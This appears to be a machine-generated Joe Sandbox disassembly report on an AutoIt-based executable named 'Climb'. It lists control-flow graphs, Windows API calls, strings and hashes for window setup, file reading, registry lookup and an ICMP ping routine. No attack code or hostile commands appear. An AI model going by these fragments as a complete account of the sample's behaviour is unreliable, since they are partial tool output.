                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                      • String ID: +$0$0+m"O$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                      • API String ID: 2914291525-2590276412
                                                                                                                                                                      • Opcode ID: 2b3db5de09b9585c5d771cb621e281ac3f1f79358202d569005be55ad4062792
                                                                                                                                                                      • Instruction ID: 0022feadc005b286763d3eb66d33fbb4a4582061566019b9840d87dd138d45e9
                                                                                                                                                                      • Opcode Fuzzy Hash: 2b3db5de09b9585c5d771cb621e281ac3f1f79358202d569005be55ad4062792
                                                                                                                                                                      • Instruction Fuzzy Hash: 5421E5B1D01308AFDB00DF94EC89B9DBBF4FB18B10F10511AF911B62A0D7B54588AFA0

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 356 4f370f-4f3724 357 4f3726-4f3729 356->357 358 4f3784-4f3786 356->358 360 4f372b-4f3732 357->360 361 4f378a 357->361 358->357 359 4f3788 358->359 362 4f376f-4f3777 DefWindowProcW 359->362 365 4f3738-4f373d 360->365 366 4f3804-4f380c PostQuitMessage 360->366 363 533df4-533e1c call 4f2f92 call 50f23c 361->363 364 4f3790-4f3795 361->364 370 4f377d-4f3783 362->370 399 533e21-533e28 363->399 372 4f37bc-4f37e3 SetTimer RegisterWindowMessageW 364->372 373 4f3797-4f379a 364->373 367 533e61-533e75 call 55c8f7 365->367 368 4f3743-4f3747 365->368 371 4f37b8-4f37ba 366->371 367->371 391 533e7b 367->391 374 4f380e-4f3818 call 50fcad 368->374 375 4f374d-4f3752 368->375 371->370 372->371 376 4f37e5-4f37f0 CreatePopupMenu 372->376 379 533d95-533d98 373->379 380 4f37a0-4f37b3 KillTimer call 4f3907 call 4f59ff 373->380 393 4f381d 374->393 381 533e46-533e4d 375->381 382 4f3758-4f375d 375->382 376->371 386 533dd0-533def MoveWindow 379->386 387 533d9a-533d9e 379->387 380->371 381->362 397 533e53-533e5c call 551423 381->397 389 4f3763-4f3769 382->389 390 4f37f2-4f3802 call 4f381f 382->390 386->371 394 533da0-533da3 387->394 395 533dbf-533dcb SetFocus 387->395 389->362 389->399 390->371 391->362 393->371 394->389 400 533da9-533dba call 4f2f92 394->400 395->371 397->362 399->362 405 533e2e-533e41 call 4f3907 call 4f396b 399->405 400->371 405->362
                                                                                                                                                                      APIs
                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,004F3709,?,?), ref: 004F3777
                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,004F3709,?,?), ref: 004F37A3
                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004F37C6
                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,004F3709,?,?), ref: 004F37D1
                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004F37E5
                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 004F3806
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                      • String ID: 0$\$0$\$TaskbarCreated
                                                                                                                                                                      • API String ID: 129472671-3681040219
                                                                                                                                                                      • Opcode ID: e158e4714528ed1a2e4980a203e9fa38f57b988d12bb71f1657bfc7238392689
                                                                                                                                                                      • Instruction ID: f0d6b16b1e528984a95adec835a22cae2e0f55f3bca047349f05a9b0439cfeac
                                                                                                                                                                      • Opcode Fuzzy Hash: e158e4714528ed1a2e4980a203e9fa38f57b988d12bb71f1657bfc7238392689
                                                                                                                                                                      • Instruction Fuzzy Hash: F241C3F010458DBEDB143F688C49F7A3FE5F750302F00812BFA0695290CABC9B49A76A

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 412 5309db-530a0b call 5307af 415 530a26-530a32 call 525594 412->415 416 530a0d-530a18 call 51f636 412->416 421 530a34-530a49 call 51f636 call 51f649 415->421 422 530a4b-530a94 call 53071a 415->422 423 530a1a-530a21 call 51f649 416->423 421->423 432 530b01-530b0a GetFileType 422->432 433 530a96-530a9f 422->433 430 530cfd-530d03 423->430 434 530b53-530b56 432->434 435 530b0c-530b3d GetLastError call 51f613 CloseHandle 432->435 437 530aa1-530aa5 433->437 438 530ad6-530afc GetLastError call 51f613 433->438 441 530b58-530b5d 434->441 442 530b5f-530b65 434->442 435->423 449 530b43-530b4e call 51f649 435->449 437->438 443 530aa7-530ad4 call 53071a 437->443 438->423 446 530b69-530bb7 call 5254dd 441->446 442->446 447 530b67 442->447 443->432 443->438 454 530bc7-530beb call 5304cd 446->454 455 530bb9-530bc5 call 53092b 446->455 447->446 449->423 462 530bfe-530c41 454->462 463 530bed 454->463 455->454 461 530bef-530bf9 call 528a2e 455->461 461->430 465 530c43-530c47 462->465 466 530c62-530c70 462->466 463->461 465->466 468 530c49-530c5d 465->468 469 530c76-530c7a 466->469 470 530cfb 466->470 468->466 469->470 471 530c7c-530caf CloseHandle call 53071a 469->471 470->430 474 530ce3-530cf7 471->474 475 530cb1-530cdd GetLastError call 51f613 call 5256a6 471->475 474->470 475->474
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0053071A: CreateFileW.KERNEL32(00000000,00000000,?,00530A84,?,?,00000000,?,00530A84,00000000,0000000C), ref: 00530737
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00530AEF
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00530AF6
                                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 00530B02
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00530B0C
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00530B15
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00530B35
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00530C7F
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00530CB1
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00530CB8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                      • String ID: H
                                                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                                                      • Opcode ID: d9e401d98317686e878e364a3f3818a0cc772b980a9f3b6ab971b1e60d184ef4
                                                                                                                                                                      • Instruction ID: 43df02b1845731f75ef91ca420c93c644ce1abe672bf4d1fd4557f71be468065
                                                                                                                                                                      • Opcode Fuzzy Hash: d9e401d98317686e878e364a3f3818a0cc772b980a9f3b6ab971b1e60d184ef4
                                                                                                                                                                      • Instruction Fuzzy Hash: 95A12532A046098FDF18AF68D865BAD7FA0BF46324F141159F811AB2D1DB319C16CB65

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00534B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 004F55B2
                                                                                                                                                                        • Part of subcall function 004F5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004F525A
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004F53C4
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00534BFD
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00534C3E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00534C80
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00534CE7
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00534CF6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                      • API String ID: 98802146-2727554177
                                                                                                                                                                      • Opcode ID: ae35e64224f7d34e6fa5fa7fa616a408300a3bdbf0c934e3d8866967fb4eb350
                                                                                                                                                                      • Instruction ID: 9119ff7638b2d3222242c67fe4fa439d14d5b13831d62b072da524cc0d6e68f7
                                                                                                                                                                      • Opcode Fuzzy Hash: ae35e64224f7d34e6fa5fa7fa616a408300a3bdbf0c934e3d8866967fb4eb350
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B71BE71004309AEC704EF65EC85DABBBF8FFA8744F40882EF540931A0DB759A48CB96

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004F34DE
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004F34ED
                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 004F3503
                                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 004F3515
                                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 004F3527
                                                                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004F353F
                                                                                                                                                                      • RegisterClassExW.USER32(?), ref: 004F3590
                                                                                                                                                                        • Part of subcall function 004F3624: GetSysColorBrush.USER32(0000000F), ref: 004F3657
                                                                                                                                                                        • Part of subcall function 004F3624: RegisterClassExW.USER32(00000030), ref: 004F3681
                                                                                                                                                                        • Part of subcall function 004F3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004F3692
                                                                                                                                                                        • Part of subcall function 004F3624: InitCommonControlsEx.COMCTL32(?), ref: 004F36AF
                                                                                                                                                                        • Part of subcall function 004F3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004F36BF
                                                                                                                                                                        • Part of subcall function 004F3624: LoadIconW.USER32(000000A9), ref: 004F36D5
                                                                                                                                                                        • Part of subcall function 004F3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004F36E4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                                                                      • Opcode ID: 820e74b36a2104c0eaebef8acd5ad3612e4cf9732fd604553ce8e6c766772e34
                                                                                                                                                                      • Instruction ID: bda0c98352d212acb883b156110f2909ae46fb080bddf8f1be6b2db5be260fbe
                                                                                                                                                                      • Opcode Fuzzy Hash: 820e74b36a2104c0eaebef8acd5ad3612e4cf9732fd604553ce8e6c766772e34
                                                                                                                                                                      • Instruction Fuzzy Hash: 6D213A70D00798AFDB109FA5EC55FA9BFF4FB18B50F00442AEA04B62A0D7B94548AF94

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 553 570fb8-570fef call 4fe6a0 556 570ff1-570ffe call 4fc98d 553->556 557 57100f-571021 WSAStartup 553->557 556->557 566 571000-57100b call 4fc98d 556->566 559 571054-571091 call 50c1f6 call 4f8ec0 call 50f9d4 inet_addr gethostbyname 557->559 560 571023-571031 557->560 576 571093-5710a0 IcmpCreateFile 559->576 577 5710a2-5710b0 559->577 563 571036-571046 560->563 564 571033 560->564 567 57104b-57104f 563->567 568 571048 563->568 564->563 566->557 571 571249-571251 567->571 568->567 576->577 578 5710d3-571100 call 51017b call 4f423c 576->578 579 5710b5-5710c5 577->579 580 5710b2 577->580 589 571102-571129 IcmpSendEcho 578->589 590 57112b-571148 IcmpSendEcho 578->590 581 5710c7 579->581 582 5710ca-5710ce 579->582 580->579 581->582 584 571240-571244 call 4fbd98 582->584 584->571 591 57114c-57114e 589->591 590->591 592 571150-571155 591->592 593 5711ae-5711bc 591->593 596 57115b-571160 592->596 597 5711f8-57120a call 4fe6a0 592->597 594 5711c1-5711c8 593->594 595 5711be 593->595 598 5711e4-5711ed 594->598 595->594 599 571162-571167 596->599 600 5711ca-5711d8 596->600 611 571210 597->611 612 57120c-57120e 597->612 604 5711f2-5711f6 598->604 605 5711ef 598->605 599->593 606 571169-57116e 599->606 602 5711dd 600->602 603 5711da 600->603 602->598 603->602 608 571212-571229 IcmpCloseHandle WSACleanup 604->608 605->604 609 571193-5711a1 606->609 610 571170-571175 606->610 608->584 616 57122b-57123d call 51013d call 510184 608->616 614 5711a6-5711ac 609->614 615 5711a3 609->615 610->600 613 571177-571185 610->613 611->608 612->608 617 571187 613->617 618 57118a-571191 613->618 614->598 615->614 616->584 617->618 618->598
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAStartup.WS2_32(00000101,?), ref: 00571019
                                                                                                                                                                      • inet_addr.WSOCK32(?), ref: 00571079
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00571085
                                                                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00571093
                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00571123
                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00571142
                                                                                                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00571216
                                                                                                                                                                      • WSACleanup.WSOCK32 ref: 0057121C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                      • String ID: Ping
                                                                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                                                                      • Opcode ID: 6c3cfefa817eeacbb808dd7f57c0fac7e13c4a44f82cc2907a92eb5dcfd9be33
                                                                                                                                                                      • Instruction ID: 6aec3f84ce42208a97758e5e7b92b8e12301f05c4103472b703e746b6a8816bf
                                                                                                                                                                      • Opcode Fuzzy Hash: 6c3cfefa817eeacbb808dd7f57c0fac7e13c4a44f82cc2907a92eb5dcfd9be33
                                                                                                                                                                      • Instruction Fuzzy Hash: CE91CE30604601AFD720DF29D888F26BFE0BF44318F14C9A9E5698F6A2C730ED85DB85
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Variable must be of type 'Object'.$t5\$t5\$t5\$t5\$t5\t5\
                                                                                                                                                                      • API String ID: 0-3632540058
                                                                                                                                                                      • Opcode ID: 04127c692c6de97e7d0d160599f7f687ace59fd9e463817f27bcdf6cc96f9a30
                                                                                                                                                                      • Instruction ID: 3255eb997d3e3e37f410a3ca6056a0a39708cba3a28a19704972d5939711fd82
                                                                                                                                                                      • Opcode Fuzzy Hash: 04127c692c6de97e7d0d160599f7f687ace59fd9e463817f27bcdf6cc96f9a30
                                                                                                                                                                      • Instruction Fuzzy Hash: 49C29E71E00209DFCB20DF58C884BBEBBB1BF45314F24816AEA05AB391E379AD45CB55
                                                                                                                                                                      APIs
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 005015F2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                      • String ID: t5\$t5\$t5\$t5\$t5\t5\
                                                                                                                                                                      • API String ID: 1385522511-1249404307
                                                                                                                                                                      • Opcode ID: e39d84d9cd860c574d783afb4130f493aeb083ae624296fd45037fd29981ee37
                                                                                                                                                                      • Instruction ID: 82115712cdf7b134598a7692d8845e3e4965043dd1440136d9e3822150bbb73a
                                                                                                                                                                      • Opcode Fuzzy Hash: e39d84d9cd860c574d783afb4130f493aeb083ae624296fd45037fd29981ee37
                                                                                                                                                                      • Instruction Fuzzy Hash: CDB25674A08741CFDB24CF18C480B6EBBE1BB99304F14995DE9898B3D2D771E985CB92

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 004F32AF
                                                                                                                                                                        • Part of subcall function 004F327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 004F32B7
                                                                                                                                                                        • Part of subcall function 004F327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004F32C2
                                                                                                                                                                        • Part of subcall function 004F327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004F32CD
                                                                                                                                                                        • Part of subcall function 004F327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 004F32D5
                                                                                                                                                                        • Part of subcall function 004F327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 004F32DD
                                                                                                                                                                        • Part of subcall function 004F3205: RegisterWindowMessageW.USER32(00000004,?,004F2964), ref: 004F325D
                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004F2A0A
                                                                                                                                                                      • OleInitialize.OLE32 ref: 004F2A28
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00533A0D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                      • String ID: (&\$0$\$4'\$d(\$$\
                                                                                                                                                                      • API String ID: 1986988660-501023031
                                                                                                                                                                      • Opcode ID: 341958b1f67558cc2f5fe2ace2574cf5c44f9985bc934d1d228ea961eff5452b
                                                                                                                                                                      • Instruction ID: 84a12c0b38c410b1ce7c1d1336d30f6ee8ae2eaa7d6646a70a00d509aef50bf9
                                                                                                                                                                      • Opcode Fuzzy Hash: 341958b1f67558cc2f5fe2ace2574cf5c44f9985bc934d1d228ea961eff5452b
                                                                                                                                                                      • Instruction Fuzzy Hash: 8971A2B0901B058F8788EF6AEDA5E263BF0F768304F50512ED508DB361EBB44449EF68

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1633 5290c5-5290d5 1634 5290d7-5290ea call 51f636 call 51f649 1633->1634 1635 5290ef-5290f1 1633->1635 1651 529471 1634->1651 1637 5290f7-5290fd 1635->1637 1638 529459-529466 call 51f636 call 51f649 1635->1638 1637->1638 1641 529103-52912e 1637->1641 1656 52946c call 522b5c 1638->1656 1641->1638 1644 529134-52913d 1641->1644 1647 529157-529159 1644->1647 1648 52913f-529152 call 51f636 call 51f649 1644->1648 1649 529455-529457 1647->1649 1650 52915f-529163 1647->1650 1648->1656 1655 529474-529479 1649->1655 1650->1649 1654 529169-52916d 1650->1654 1651->1655 1654->1648 1658 52916f-529186 1654->1658 1656->1651 1661 5291a3-5291ac 1658->1661 1662 529188-52918b 1658->1662 1666 5291ca-5291d4 1661->1666 1667 5291ae-5291c5 call 51f636 call 51f649 call 522b5c 1661->1667 1664 529195-52919e 1662->1664 1665 52918d-529193 1662->1665 1668 52923f-529259 1664->1668 1665->1664 1665->1667 1670 5291d6-5291d8 1666->1670 1671 5291db-5291dc call 523b93 1666->1671 1699 52938c 1667->1699 1672 52925f-52926f 1668->1672 1673 52932d-529336 call 52fc1b 1668->1673 1670->1671 1677 5291e1-5291f9 call 522d38 * 2 1671->1677 1672->1673 1676 529275-529277 1672->1676 1686 529338-52934a 1673->1686 1687 5293a9 1673->1687 1676->1673 1680 52927d-5292a3 1676->1680 1702 529216-52923c call 5297a4 1677->1702 1703 5291fb-529211 call 51f649 call 51f636 1677->1703 1680->1673 1684 5292a9-5292bc 1680->1684 1684->1673 1689 5292be-5292c0 1684->1689 1686->1687 1692 52934c-52935b GetConsoleMode 1686->1692 1691 5293ad-5293c5 ReadFile 1687->1691 1689->1673 1694 5292c2-5292ed 1689->1694 1696 529421-52942c GetLastError 1691->1696 1697 5293c7-5293cd 1691->1697 1692->1687 1698 52935d-529361 1692->1698 1694->1673 1701 5292ef-529302 1694->1701 1704 529445-529448 1696->1704 1705 52942e-529440 call 51f649 call 51f636 1696->1705 1697->1696 1706 5293cf 1697->1706 1698->1691 1707 529363-52937d ReadConsoleW 1698->1707 1700 52938f-529399 call 522d38 1699->1700 1700->1655 1701->1673 1713 529304-529306 1701->1713 1702->1668 1703->1699 1710 529385-52938b call 51f613 1704->1710 1711 52944e-529450 1704->1711 1705->1699 1717 5293d2-5293e4 1706->1717 1708 52939e-5293a7 1707->1708 1709 52937f GetLastError 1707->1709 1708->1717 1709->1710 1710->1699 1711->1700 1713->1673 1720 529308-529328 1713->1720 1717->1700 1724 5293e6-5293ea 1717->1724 1720->1673 1728 529403-52940e 1724->1728 1729 5293ec-5293fc call 528de1 1724->1729 1731 529410 call 528f31 1728->1731 1732 52941a-52941f call 528c21 1728->1732 1738 5293ff-529401 1729->1738 1739 529415-529418 1731->1739 1732->1739 1738->1700 1739->1738
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
